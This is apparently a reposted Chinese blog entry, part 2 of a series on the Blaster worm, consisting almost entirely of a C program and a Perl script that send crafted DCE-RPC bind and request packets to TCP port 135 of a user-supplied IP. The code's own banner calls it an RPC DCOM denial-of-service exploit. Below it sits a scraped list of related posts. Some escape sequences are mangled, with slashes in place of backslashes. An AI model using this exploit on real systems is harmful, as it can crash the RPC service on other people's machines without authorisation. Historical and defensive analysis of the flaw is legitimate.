冲击波病毒内幕点滴（2）

附1

测试代码

#include

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1[0x1000];

printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org/n");

printf("Welcome to http://www.xfocus.net/n");

if(argc<2)

{

printf("useage:%s target/n",argv[0]);

exit(1);

}

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d/n",WSAGetLastError());

return;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d/n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

#!/usr/bin/perl -w

# By SecurITeam's Experts

my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";

my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";

use Socket;

$proto = getprotobyname('tcp');

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");

$IP = $ARGV[0];

$target = inet_aton($IP);

$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;

sleep(2);

select(STDOUT);

close(S);

冲击波病毒内幕点滴（2）相关推荐

冲击波病毒内幕点滴（4） (转)
冲击波病毒内幕点滴(4) (转)[@more@] 附3XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:offi ...
冲击波病毒内幕点滴（3）
附2 LSD RPC 溢出漏洞之分析转摘请注明作者和安全焦点作者:FLASHSKY 作者单位:启明星辰积极防御实验室 WWW SITE:WWW.VENUSTECH.COM.CN WWW.XFOCU ...
遇到冲击波病毒引起的准备关机时怎么办?
机器中了冲击波病毒后,有时候会突然弹出一个准备关机对话框,这时你可能慌忙中赶快把自己的工作保存,然后无奈的等待,其实大可不必,出现准备关机对话框后,你可以打开一个cmd窗口,然后输入"shu ...
老题再谈----有关冲击波病毒
今天上网不幸中了毒,在弹出的对话框中,显示只有1分钟时间就关机(而且是倒计时),连关机的菜单都不可用,其他工作就更没有办法进行了.没有办法,只好重新启动,还是弹出显示只有1分钟时间就关机.几次都这样. ...
冲击波病毒攻击-《截获网站服务器数据》
今晚课题点击[阅读原文]或长按图片[识别图中的二维码]即可
XINGNET交换机病毒防范
随着网络给人们的生活带来巨大的收益,人们也正逐渐遭受网络病毒带来的侵害之苦,网络动荡.网络瘫痪...... 病毒有很多种,根据病毒存在的媒体,病毒可以划分为网络型病毒,文件型病毒,引导型病毒等.文件型 ...
Svchost.exe病毒
Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost. ...
解读互联网40年中的10大“杀手”病毒
从1969年到现在已经走过了40年,在这一代人的历程中鉴定了互联网的发展,随着技术的不断创新及发展,互联网开始"茁壮成长", 现代社会中互联网已经成为人们工作.学习.生活的重要组成 ...
二十年最强悍病毒排行榜
自从第一个计算机病毒爆发以来,已经过去了20年左右的时间.<InformationWeek>最近评出了迄今为止破坏程度最为严重的十大病毒. <?xml:namespace prefi ...

冲击波病毒内幕点滴（2）

冲击波病毒内幕点滴（2）相关推荐

最新文章

热门文章